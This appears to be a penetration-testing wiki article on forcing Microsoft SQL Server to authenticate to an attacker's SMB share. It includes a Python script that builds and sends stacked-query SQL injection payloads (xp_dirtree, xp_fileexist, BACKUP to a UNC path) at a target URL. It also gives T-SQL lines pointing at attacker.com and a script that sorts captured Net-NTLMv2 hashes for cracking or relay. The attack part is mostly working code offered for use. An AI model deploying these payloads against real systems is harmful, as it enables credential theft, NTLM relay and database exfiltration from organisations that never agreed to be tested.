MSSQL UNC Path

Context

This article explains how to abuse UNC path handling in Microsoft SQL Server (MSSQL) to force the server to connect to an attacker-controlled SMB host, capturing the Net-NTLM challenge-response of the account the SQL Server service runs as and, where the attacker's share is writable, exfiltrating data such as database backups. The primitives are reachable from any SQL session, most often through a stacked-query SQL injection against a web application backed by MSSQL. Readers should already understand UNC paths, NTLM authentication, SMB file sharing, and SQL injection against Microsoft SQL Server.

Theory

UNC Path Exploitation in MSSQL

Universal Naming Convention (UNC) paths of the form \\host\share\path identify resources on a network, such as files and directories. When SQL Server is told to open such a path, the Windows SMB client on the database host connects to the named server and authenticates with the credentials of the SQL Server service account, exactly as it would for a legitimate file server. If the attacker controls that host, they receive an NTLM challenge-response for that account. This is not a bug in a particular version: any SQL Server feature that takes a file path will accept a UNC path, and the connection and authentication are attempted whether or not the share exists.

Using xp_dirtree and xp_fileexist

xp_dirtree and xp_fileexist are undocumented extended stored procedures in the master database. xp_dirtree lists the directories (and optionally files) below a path, and xp_fileexist reports whether a file exists. Both accept UNC paths, return nothing the attacker needs to see (so a blind injection is enough), and in default configurations are callable by low-privileged logins, which makes them the usual first choice after a stacked-query SQL injection. Either one makes the SQL Server service account send its NTLM authentication to the host named in the path.

Backup and Restore Methods

The BACKUP and RESTORE commands in MSSQL write a database backup to, or read one from, a file path. Pointing that path at a UNC location makes the service account authenticate to the remote host before any data is written or read. Unlike the extended procedures, BACKUP requires membership in sysadmin, db_owner or db_backupoperator for the database named, and RESTORE requires sysadmin, dbcreator or ownership of the database, so this is the fallback when xp_dirtree and xp_fileexist are disabled or denied. A BACKUP that reaches a writable attacker share also leaves a complete copy of the database on the attacker's host.
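The primitives described in the two sections above, assembled into injection payloads. This is an added example written for this page, not code from the page's author or from any tool it mentions; it assumes a hypothetical target with a stacked-query injection in a GET parameter and a hypothetical attacker listener at 10.0.0.5, and it contacts nothing unless fire() is called.

```python
"""MSSQL UNC-path injection payloads (added example; not code from the page).

Assumptions (hypothetical): the target web app has a stacked-query SQL
injection in a string parameter (e.g. http://target/items?id=1) and the
attacker runs an SMB listener at ATTACKER_HOST.  Nothing here touches the
network unless fire() is called.
"""
import urllib.parse
import urllib.request

ATTACKER_HOST = "10.0.0.5"   # hypothetical listener; use an IP, not a name,
SHARE = "s"                  # so the SQL host needs no DNS to reach it

# T-SQL primitives that make the SQL Server *service account* open a UNC path.
# xp_dirtree / xp_subdirs / xp_fileexist work for low-privileged logins in
# default configurations; BACKUP needs sysadmin, db_owner or db_backupoperator
# on the database substituted for {db}.
PRIMITIVES = {
    "xp_dirtree":   "EXEC master..xp_dirtree '{unc}',1,1",
    "xp_subdirs":   "EXEC master..xp_subdirs '{unc}'",
    "xp_fileexist": "EXEC master..xp_fileexist '{unc}\\x.txt'",
    "backup":       "BACKUP DATABASE {db} TO DISK='{unc}\\{db}.bak'",
}

# Worth extracting first (error-, union- or boolean-based) so you know whose
# authentication will leak.  sys.dm_server_services needs VIEW SERVER STATE.
PREFLIGHT = {
    "login":        "SELECT SYSTEM_USER",
    "is_sysadmin":  "SELECT IS_SRVROLEMEMBER('sysadmin')",
    "service_acct": "SELECT service_account FROM sys.dm_server_services "
                    "WHERE servicename LIKE 'SQL Server (%'",
}


def unc_path(host: str, share: str, *subpath: str) -> str:
    """Build \\\\host\\share[\\subpath...]."""
    return "\\\\" + "\\".join((host, share, *subpath))


def sql_quote(s: str) -> str:
    """Double single quotes so the path cannot break out of the injected literal."""
    return s.replace("'", "''")


def tsql(primitive: str, host: str = ATTACKER_HOST, share: str = SHARE,
         db: str = "master") -> str:
    """T-SQL statement that forces the service account to authenticate to host."""
    return PRIMITIVES[primitive].format(unc=sql_quote(unc_path(host, share)), db=db)


def stacked(statement: str, quote: str = "'") -> str:
    """Close the application's string literal, run our statement, comment out the
    rest.  Nothing in the HTTP response matters: the SMB connection is the result."""
    return f"{quote};{statement};-- "


def injected_url(base: str, param: str, payload: str) -> str:
    """Place the payload in a GET parameter with proper URL encoding."""
    sep = "&" if "?" in base else "?"
    return base + sep + urllib.parse.urlencode({param: payload})


def fire(base: str, param: str, primitive: str = "xp_dirtree",
         timeout: float = 5.0) -> str:
    """Send one injected request.  Errors are ignored: an HTTP 500 from the
    application is expected.  Returns the URL that was requested."""
    url = injected_url(base, param, stacked(tsql(primitive)))
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except Exception:   # hypothetical target: refused, 500, timeout...
        pass
    return url


if __name__ == "__main__":
    for name in PRIMITIVES:
        print(stacked(tsql(name)))
```

Run the preflight queries first: the service account name tells you whether the capture will be a crackable domain user or a machine account (HOST$) that can only be relayed, and IS_SRVROLEMEMBER tells you whether the BACKUP fallback is even worth trying.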

Hash Leakage Techniques

What leaks is not the stored NT hash but the NTLM challenge-response (Net-NTLMv1 or, on any modern host, Net-NTLMv2) that the SQL Server service account produces when it answers the attacker's server challenge. A Net-NTLMv2 response can be cracked offline (hashcat mode 5600) if the account's password is weak, or relayed to another host that accepts NTLM and does not require SMB signing. Which account answers depends on how SQL Server runs: a domain user service account leaks that user's response; a virtual account (NT Service\MSSQLSERVER) or NETWORK SERVICE authenticates as the computer account (HOST$), whose password is not realistically crackable but whose response can still be relayed. The attacker therefore runs a malicious SMB server that completes the handshake and records the response.

NTLM Capture Mechanisms

Capturing requires an SMB listener under the attacker's control that the SQL Server can reach on TCP 445. Responder fills this role: it answers the connection, issues a fixed server challenge by default, completes the NTLM handshake and logs the client IP, account name and response in a hashcat-ready format. When the goal is to relay rather than crack, the same UNC trigger is pointed at an NTLM relay listener instead. Either way the attacker ends up with credentials or sessions usable elsewhere on the network.

Network Exfiltration Strategies

Data exfiltration is the unauthorized transfer of data out of a network. The UNC trigger doubles as an exfiltration channel: a BACKUP DATABASE directed at a writable attacker share copies the whole database over SMB, and the authentication itself carries the service account's credential material. Outbound SMB on port 445 is frequently blocked at the perimeter, so this works most reliably from a foothold inside the network; against an external listener, a blocked port means no capture at all, and that absence is itself a useful result when testing egress filtering.

Practice

Exploiting xp_dirtree for UNC Path Access

  • Execute the following statement, directly or inside a stacked-query injection, to make the SQL Server service account connect to the UNC path:

    EXEC master..xp_dirtree '\\attacker.com\share';  -- returns nothing useful; the SMB connection is the result
    

    xp_dirtree asks the server to enumerate the share, which makes the Windows SMB client on the SQL host authenticate to attacker.com as the service account before any listing takes place. Prefer an IP address over a hostname so the attempt does not depend on DNS, and note that the share does not need to exist. xp_fileexist with a file path under the same share behaves the same way if xp_dirtree is unavailable.

  • Set up Responder to capture the NTLM response:

    Start Responder on the attacker host before sending the query, bound to the interface the SQL Server can reach (its -I option), and make sure no real SMB service is already listening on port 445 there. Responder answers the connection, completes the NTLM handshake and logs the client IP, account name and NTLMv2 response in hashcat format.

Using BACKUP Command for UNC Path Exploitation

  • Force MSSQL to authenticate to the UNC path using the BACKUP command when the extended procedures are denied; the login needs backup rights (sysadmin, db_owner or db_backupoperator) on the database named:

    BACKUP DATABASE test TO DISK = '\\attacker.com\share\backup.bak';  -- 'test' is a placeholder database name
    

    The destination of BACKUP is a file path, so the server authenticates to attacker.com before writing anything. If the share exists and is writable, the full backup lands on the attacker's host; if it does not, the command fails, but the authentication has already been captured.

  • Monitor with Responder for NTLM capture:

    Keep Responder running across the attempt. The capture looks identical to the xp_dirtree case, because the same service account authenticates to the same share; only the privilege needed on the SQL side differs.
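Once Responder has logged a capture, the next question is whether it is worth cracking at all. The script below is an added example for this page (not Responder's code and not from the page's author) that triages Responder-style NTLMv2 output for the "Hash Leakage" and "NTLM Capture" points above: it flags machine accounts (SQL Server running as a virtual account or NETWORK SERVICE authenticates as HOST$, which is relay-only), emits the hashcat -m 5600 line, and decodes the AV pairs in the response blob to recover the NetBIOS/DNS names and clock of the host that connected. The log text it parses is constructed for the example, not a real capture.

```python
"""Triage NTLMv2 captures in Responder's output format (added example; not code
from the page or from Responder).  SAMPLE_LOG below is constructed.

Responder prints one block per capture:
  [SMB] NTLMv2-SSP Client   : <ip>
  [SMB] NTLMv2-SSP Username : <DOMAIN\\user>
  [SMB] NTLMv2-SSP Hash     : user::DOMAIN:<server challenge>:<NTProofStr>:<blob>
and writes the same hash line under logs/.  That line is already hashcat -m 5600
input; this script adds the account-type decision and blob decoding.
"""
import re
import struct
from datetime import datetime, timezone

HASH_RE = re.compile(r"(\S+?)::(\S+?):([0-9a-fA-F]{16}):([0-9a-fA-F]{32}):([0-9a-fA-F]+)")
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 9: "TargetName"}
FILETIME_UNIX_EPOCH = 116444736000000000  # 1970-01-01 in 100 ns ticks since 1601


def parse_blob(blob_hex: str) -> dict:
    """Decode the NTLMv2_CLIENT_CHALLENGE that follows NTProofStr (MS-NLMP 2.2.2.7)."""
    b = bytes.fromhex(blob_hex)
    if b[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2 client challenge (RespType/HiRespType != 1,1)")
    filetime = struct.unpack_from("<Q", b, 8)[0]
    secs = (filetime - FILETIME_UNIX_EPOCH) // 10_000_000
    ts = datetime.fromtimestamp(secs, timezone.utc)
    av, off = {}, 28            # 8 header + 8 timestamp + 8 client nonce + 4 reserved
    while off + 4 <= len(b):
        av_id, av_len = struct.unpack_from("<HH", b, off)
        off += 4
        if av_id == 0:          # MsvAvEOL terminates the list
            break
        value = b[off:off + av_len]
        off += av_len
        if av_id in AV_NAMES:   # string-valued pairs are UTF-16LE
            av[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return {"timestamp": ts.isoformat(), "client_challenge": b[16:24].hex(), "av": av}


def triage(log_text: str) -> list:
    """One record per captured account; repeats of the same account are dropped."""
    seen, out = set(), []
    for m in HASH_RE.finditer(log_text):
        user, domain, server_chal, proof, blob = m.groups()
        key = (domain.lower(), user.lower())
        if key in seen:
            continue
        seen.add(key)
        machine = user.endswith("$")   # HOST$: virtual account / NETWORK SERVICE
        out.append({
            "user": user, "domain": domain, "server_challenge": server_chal,
            "machine_account": machine,
            "action": "relay only" if machine else "crack (hashcat -m 5600) or relay",
            "hashcat_line": m.group(0),
            **parse_blob(blob),
        })
    return out


# ---- constructed sample: what Responder would print for two SQL hosts ----------
def _blob(nb_host: str, dns_host: str, unix_time: int) -> str:
    av = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in (
        (1, nb_host.encode("utf-16-le")), (2, "CORP".encode("utf-16-le")),
        (3, dns_host.encode("utf-16-le")), (4, "corp.local".encode("utf-16-le"))))
    return (b"\x01\x01\x00\x00" + b"\x00" * 4
            + struct.pack("<Q", FILETIME_UNIX_EPOCH + unix_time * 10_000_000)
            + bytes.fromhex("0011223344556677") + b"\x00" * 4 + av + b"\x00" * 4).hex()


SAMPLE_LOG = f"""
[SMB] NTLMv2-SSP Client   : 10.10.10.20
[SMB] NTLMv2-SSP Username : CORP\\svc_sql
[SMB] NTLMv2-SSP Hash     : svc_sql::CORP:1122334455667788:{'ab' * 16}:{_blob('SQL01', 'sql01.corp.local', 1704067200)}
[SMB] NTLMv2-SSP Client   : 10.10.10.21
[SMB] NTLMv2-SSP Username : CORP\\SQL02$
[SMB] NTLMv2-SSP Hash     : SQL02$::CORP:1122334455667788:{'cd' * 16}:{_blob('SQL02', 'sql02.corp.local', 1704067260)}
"""

if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(f"{r['domain']}\\{r['user']:<10} {r['av'].get('DnsComputerName')}"
              f"  {r['timestamp']}  -> {r['action']}")
```

The decoded DnsComputerName is a useful sanity check on a real engagement: it confirms which SQL Server actually connected, which matters when one injection point fronts several database hosts.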

Tools

  • Responder
